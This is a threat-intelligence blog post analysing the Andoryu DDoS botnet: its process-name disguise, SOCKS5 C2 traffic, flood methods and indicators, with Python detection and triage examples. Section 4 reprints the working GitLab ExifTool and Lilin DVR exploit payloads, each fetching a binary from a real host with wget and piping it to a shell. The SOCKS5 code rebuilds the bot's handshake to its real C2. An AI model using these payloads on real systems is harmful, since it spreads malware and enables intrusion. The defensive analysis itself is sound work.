URL: https://ti.qianxin.com/blog/articles/Andoryu-Botnet-A-New-Botnet-Based-on-Socks-Protocol/


Andoryu Botnet——A New Botnet Based on Socks Protocol

2023-02-20 By RedDrip Team (红雨滴团队) | Event Tracking



1. OVERVIEW

In early February 2023, the threat monitoring system of the QiAnXin Threat
Intelligence Center observed a malware family spreading by exploiting
CVE-2021-22205 (the GitLab ExifTool remote code execution vulnerability).
Analysis confirmed that the malware does not belong to any known botnet family.

We call this new botnet "Andoryu Botnet", after the name its creator uses for
it. The bot reaches its C2 server through a SOCKS5 proxy rather than connecting
to the C2 directly.

The recent spreading trend of Andoryu Botnet is shown in the figure below. The
activity timeline shows that Andoryu only spreads in short bursts around the
time it is updated, and only in a small area, which indicates that the botnet
is still under development.





2. ANALYSIS OF BEHAVIORS

This article uses the x86 build of Andoryu Botnet as the example for analysis.
The sample information is as follows:

File name: Andoryu.x86
File size: 42208 bytes
MD5:       D203E1BB0BA3E8385FF9E1F83C10EB2D

2.1 CHECK OF STARTUP PARAMETERS

The first thing Andoryu does is check its command-line arguments: it only runs
its real logic when at least one argument is supplied. The dropper commands
shown in section 4 satisfy this check by starting it as "./Andoryu.10wget
gitlab.x86".



2.2 STRING ENCRYPTION

Most of the important strings in the malware (the banner, the proxy and C2
addresses, and so on) are stored encrypted in the binary, and a single function
decrypts them in bulk early in execution. The plaintext therefore only exists
in process memory at runtime, not in the file on disk.







2.3 PROCESS NAME DISGUISE

It calls prctl(PR_SET_NAME) to change its process name to "/bin/bash", so that
the bot shows up as a shell in ps and top.
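To see what this call does and does not hide, the following is an added example (not the sample's own code) that renames the current Python process the same way and then checks /proc. It assumes a Linux host with /proc mounted. The point a hunter needs: PR_SET_NAME only rewrites the comm field that ps and top display; /proc/<pid>/exe still points at the real ELF and /proc/<pid>/cmdline still holds the original argv, so comparing comm against exe is enough to spot the disguise.

```python
"""Process-name disguise via prctl(PR_SET_NAME) and a /proc check that sees through it.
Added example, not the sample's code; assumes a Linux host with /proc mounted."""
import ctypes
import os
import sys

PR_SET_NAME = 15      # from <linux/prctl.h>; the kernel keeps at most 15 bytes of the name


def set_process_name(name):
    """Rename the calling thread the way the sample does (e.g. "/bin/bash").
    Returns True on success, False where prctl is unavailable (non-Linux)."""
    if not sys.platform.startswith("linux"):
        return False
    libc = ctypes.CDLL(None, use_errno=True)
    libc.prctl.restype = ctypes.c_int
    return libc.prctl(PR_SET_NAME, name.encode(), 0, 0, 0) == 0


def read_comm(pid="self"):
    """What ps/top show as the process name; this is all that prctl changes."""
    with open(f"/proc/{pid}/comm") as f:
        return f.read().rstrip("\n")


def read_exe(pid="self"):
    """The ELF actually mapped for the process; prctl cannot alter this link."""
    return os.readlink(f"/proc/{pid}/exe")


def read_cmdline(pid="self"):
    """argv as launched; unchanged unless the binary also overwrites argv[0]."""
    with open(f"/proc/{pid}/cmdline", "rb") as f:
        return [a.decode(errors="replace") for a in f.read().split(b"\x00") if a]


def looks_disguised(pid="self"):
    """Heuristic: a normal process's comm is the first 15 chars of the basename of
    what was exec'd, so it should be a prefix of the exe basename. A comm such as
    "/bin/bash" on a process whose exe is not bash fails that test.
    (Interpreters reached through differently named symlinks, e.g. sh -> dash,
    are a known false positive; review hits rather than alerting blindly.)"""
    comm = read_comm(pid)
    exe_base = os.path.basename(read_exe(pid))
    return not exe_base.startswith(comm)


def scan_all(exclude_self=True):
    """Walk /proc and return [(pid, comm, exe)] for processes that look disguised."""
    hits = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit() or (exclude_self and entry == str(os.getpid())):
            continue
        try:
            if looks_disguised(entry):
                hits.append((int(entry), read_comm(entry), read_exe(entry)))
        except OSError:
            continue   # kernel threads have no exe; other users' processes may be unreadable
    return hits


if __name__ == "__main__":
    print("before:", read_comm(), read_exe())
    if set_process_name("/bin/bash"):
        print("after: ", read_comm(), read_exe(), "disguised =", looks_disguised())
    for pid, comm, exe in scan_all():
        print(f"suspicious pid {pid}: comm={comm!r} exe={exe!r}")
```

Run it as root to cover every process; unprivileged users only see their own exe links. Note that the name is truncated to 15 bytes by the kernel, so a longer disguise string would appear cut off in comm.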



2.4 PRINTING BOTNET INFORMATION

The decrypted strings include a block of botnet information that is printed to
the console when the malware runs.



The botnet is named Andoryu after this string, and the embedded date shows that
the creator was testing the malware on December 30, 2022.



3. SOCKS5 COMMUNICATION

3.1 COMMUNICATION PROCESS

The bot communicates with its C2 server through a SOCKS5 proxy. The specific
communication process is as follows:

(1) First, it connects to the hard-coded proxy server at 152.67.66.37:1080.





(2) Once the TCP three-way handshake with the proxy completes, it begins SOCKS5
negotiation. The only authentication method it offers is "no authentication
required" (0x00), so no username or password is exchanged with the proxy.





(3) It then sends a CONNECT request telling the proxy which remote server to
reach. This address is also recovered during bulk string decryption
(DST_C2 = "172.86.123.20:1025").



(4) Once the proxy reports success the tunnel is open, and the bot sends a
beacon packet through it that includes the local IP information of the
infected host.





(5) From then on the malware receives commands from the C2 server through the
proxy.

Because of this design, the address seen in netflow or firewall logs is the
proxy, not the C2; the real C2 address only appears inside the SOCKS5 CONNECT
request.

QiAnXin Threat Intelligence Center has been monitoring the downstream traffic,
but the attacker has not yet sent any DDoS attack instruction. We will continue
to track Andoryu Botnet and report on its latest activity.
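The exchange in steps (1) to (4), as an added example that is not the sample's code: the client side builds the same two SOCKS5 messages the bot sends (greeting offering only method 0x00, then an IPv4 CONNECT), and a small recording proxy on the other end of a socketpair shows what an analyst can recover from captured traffic to port 1080. The proxy and DST_C2 addresses are the ones from this article; the beacon body is constructed for the demo, since the real format is not documented beyond "local IP information".

```python
"""SOCKS5 exchange between the bot and its proxy, client side plus a recording fake proxy.
Added example, not the sample's code. Addresses are from the article; the beacon body
is constructed for the demo."""
import ipaddress
import socket
import struct
import threading

SOCKS_VERSION = 0x05
METHOD_NO_AUTH = 0x00   # "NO AUTHENTICATION REQUIRED", the only method the bot offers
CMD_CONNECT = 0x01
ATYP_IPV4 = 0x01
REP_SUCCEEDED = 0x00

PROXY_ADDR = ("152.67.66.37", 1080)   # hard-coded proxy (from the article)
DST_C2 = ("172.86.123.20", 1025)      # DST_C2 from the decrypted strings (from the article)


def method_select_request(methods=(METHOD_NO_AUTH,)):
    """Client greeting: VER | NMETHODS | METHODS (RFC 1928, section 3)."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def connect_request(host, port):
    """CONNECT request: VER | CMD | RSV | ATYP | DST.ADDR (4 bytes) | DST.PORT (2 bytes)."""
    return (bytes([SOCKS_VERSION, CMD_CONNECT, 0x00, ATYP_IPV4])
            + ipaddress.IPv4Address(host).packed
            + struct.pack("!H", port))


def parse_connect_request(data):
    """Pull (cmd, host, port) out of an IPv4 CONNECT request, e.g. from a pcap of the
    traffic to the proxy. This is the only place the real C2 is visible on the wire."""
    if len(data) < 10 or data[0] != SOCKS_VERSION or data[3] != ATYP_IPV4:
        raise ValueError("not an IPv4 SOCKS5 request")
    host = str(ipaddress.IPv4Address(bytes(data[4:8])))
    (port,) = struct.unpack("!H", data[8:10])
    return data[1], host, port


def recvn(sock, n):
    """Read exactly n bytes or raise; recv() may return short reads."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during handshake")
        buf += chunk
    return buf


def socks5_connect(sock, host, port):
    """Client side of the handshake on an already-connected TCP socket (steps 2 and 3)."""
    sock.sendall(method_select_request())
    ver, method = recvn(sock, 2)
    if ver != SOCKS_VERSION or method != METHOD_NO_AUTH:
        raise ConnectionError("proxy did not accept the no-auth method")
    sock.sendall(connect_request(host, port))
    reply = recvn(sock, 10)                 # an IPv4 reply is always 10 bytes
    if reply[1] != REP_SUCCEEDED:
        raise ConnectionError(f"CONNECT refused, REP=0x{reply[1]:02x}")
    return reply


def fake_proxy(sock, seen):
    """Minimal no-auth SOCKS5 server that records what the client asked for."""
    _ver, nmethods = recvn(sock, 2)
    seen["methods"] = list(recvn(sock, nmethods))
    sock.sendall(bytes([SOCKS_VERSION, METHOD_NO_AUTH]))
    _cmd, host, port = parse_connect_request(recvn(sock, 10))
    seen["dst"] = (host, port)
    # success reply with BND.ADDR/BND.PORT zeroed; the tunnel is now open
    sock.sendall(bytes([SOCKS_VERSION, REP_SUCCEEDED, 0x00, ATYP_IPV4]) + b"\x00" * 6)
    seen["beacon"] = sock.recv(4096)        # first bytes through the tunnel (step 4)
    sock.close()


def run_demo():
    """Drive the whole exchange over a socketpair so it runs offline."""
    client, proxy = socket.socketpair()
    seen = {}
    t = threading.Thread(target=fake_proxy, args=(proxy, seen))
    t.start()
    with client:
        socks5_connect(client, *DST_C2)
        # constructed beacon; the real one carries the infected host's local IP
        client.sendall(b"ANDORYU|192.0.2.10")
    t.join()
    return seen


if __name__ == "__main__":
    print(run_demo())
    print(parse_connect_request(bytes.fromhex("05010001ac567b140401")))
```

The ten bytes 05 01 00 01 ac 56 7b 14 04 01 are exactly what the bot's CONNECT request looks like on the wire for DST_C2; a network signature that keys on the proxy IP alone will miss a sample whose only change is a new proxy, whereas one that decodes the CONNECT request catches the C2 regardless of which proxy is in front of it.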



3.2 DDOS METHODS

AndoryuBot supports a variety of DDoS methods, as follows:

Name           Description
icmp-echo      ICMP flood
udp-ovh        UDP flood for OVH
udp-game       UDP game flood
udp-plain      UDP plain flood
tcp-raw        TCP flood
tcp-socket     TCP SYN flood
tcp-handshake  TCP flood



4. UPDATE AND DISSEMINATION

Correlation analysis of the discovered samples shows that updates to Andoryu
Botnet began in December 2022, and two further updates have been seen since.
The creator did not change the time string printed to the console; the updates
mainly changed the remote server address (DST_C2) and the set of supported
architectures. The CPU architectures supported by the latest version of
AndoryuBot are as follows.

 * Arm
 * Mips
 * M68K
 * SuperH
 * Sparc
 * x86

Andoryu Botnet spreads through a Lilin DVR remote command execution
vulnerability as well as CVE-2021-22205. The payloads observed in this campaign
are as follows.

CVE-2021-22205:

P(metadata
.(Copyright "\" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf Andoryu.10wget;wget http://47.87.154.192/Andoryu.x86 -O Andoryu.10wget;chmod 777 Andoryu.10wget;./Andoryu.10wget gitlab.x86;rm -rf Andoryu.10wget;<$TF | sh 1>$TF} . \" b ") )


Lilin DVR RCE:

User-Agent: Abcd
<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><SetConfiguration File="service.xml"><![CDATA[<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><Service><NTP Enable="True" Interval="20000" Server="time.nist.gov&cd /tmp;wget -O- http://47.87.154.192/lillin|sh;echo DONE"/></Service></DVR>]]></SetConfiguration></DVR>
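Triage of the two payloads above, as an added example that is not part of the article: the request bodies are copied verbatim from the page, while the detection rules and IOC extraction are mine. One detail worth noticing is that the inner Lilin document is not well-formed XML (the raw "&" in the Server attribute would be rejected by any strict parser), which means the vulnerable firmware matches attributes loosely, and a detection rule has to do the same instead of relying on an XML parser for that layer.

```python
"""Triage of the Lilin DVR and CVE-2021-22205 dropper payloads: recover the injected
command and the IOCs. Added example, not from the article; payload bodies are copied
from the article, the rules are mine."""
import re
import xml.etree.ElementTree as ET

# Lilin DVR request body, as shown in the article.
LILIN_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520">'
    '<SetConfiguration File="service.xml"><![CDATA[<?xml version="1.0" encoding="UTF-8"?>'
    '<DVR Platform="Hi3520"><Service><NTP Enable="True" Interval="20000" '
    'Server="time.nist.gov&cd /tmp;wget -O- http://47.87.154.192/lillin|sh;echo DONE"/>'
    '</Service></DVR>]]></SetConfiguration></DVR>'
)

# CVE-2021-22205 (GitLab ExifTool) metadata fragment, as shown in the article.
GITLAB_PAYLOAD = (
    r'P(metadata .(Copyright "\" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf Andoryu.10wget;'
    r'wget http://47.87.154.192/Andoryu.x86 -O Andoryu.10wget;chmod 777 Andoryu.10wget;'
    r'./Andoryu.10wget gitlab.x86;rm -rf Andoryu.10wget;<$TF | sh 1>$TF} . \" b ") )'
)

SHELL_META = re.compile(r"[;&|`]|\$\(")             # never legitimate in an NTP hostname
URL_RE = re.compile(r"https?://[^\s\"'|;<>]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def lilin_ntp_server(body):
    """Return the NTP Server value a SetConfiguration request tries to write, or None.

    The outer document is well-formed (the inner one is shielded by CDATA), so it is
    parsed properly. The inner document is deliberately matched with a regex: the raw
    '&' in the Server attribute makes it invalid XML, so a strict parser would reject
    exactly the requests we want to flag."""
    root = ET.fromstring(body.encode("utf-8"))
    cfg = root.find("SetConfiguration")
    if cfg is None or cfg.get("File") != "service.xml":
        return None
    m = re.search(r'<NTP\b[^>]*\bServer="([^"]*)"', cfg.text or "")
    return m.group(1) if m else None


def is_command_injection(value):
    """A hostname must not contain shell metacharacters; anything that does is hostile."""
    return bool(value) and SHELL_META.search(value) is not None


def gitlab_qx_command(payload):
    """Extract the shell command wrapped in Perl's qx{...} from the ExifTool payload."""
    m = re.search(r"qx\{(.*)\}", payload)
    return m.group(1) if m else None


def extract_iocs(text):
    """Download URLs and IPv4 addresses referenced by a payload, de-duplicated."""
    return {
        "urls": sorted(set(URL_RE.findall(text))),
        "ips": sorted(set(IPV4_RE.findall(text))),
    }


if __name__ == "__main__":
    server = lilin_ntp_server(LILIN_BODY)
    print("Lilin NTP Server value:", server)
    print("command injection:", is_command_injection(server))
    print("GitLab qx command:", gitlab_qx_command(GITLAB_PAYLOAD))
    for name, text in (("lilin", LILIN_BODY), ("gitlab", GITLAB_PAYLOAD)):
        print(name, extract_iocs(text))
```

Both payloads resolve to the same download host, 47.87.154.192, which is a useful pivot when the two exploits show up in different logs (a DVR's HTTP access log on one side, a GitLab upload on the other).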




5. IOCS

MD5:

D203E1BB0BA3E8385FF9E1F83C10EB2D

28F10E60D05018E6D28B79F0976A8542

F9018E4401116435DCFE2DC9D14D0FD5

2BABAF24B23872749EEC1452D7E7C0F3

ABD2496C3B703BD722386A848CC0BC12

6335ECB85ED6C6FCCF71FD841939BEC4

70A568C47785A8C58AA1D755EFE0E39E

FFE05160D769F441EF4A67271F9E614C

BB7DECCC2F6CEB2D5A5C7F5A05A4BBB1

0A1B14C2B8A453323841431FA44D0E32

C9CE8E0A1B13CBB6719133AFE5988CA7

C&C:

152.67.66.37:1080

172.86.123.20:1025

104.234.239.190:1025

Tags: Andoryu Botnet, Socks, DDoS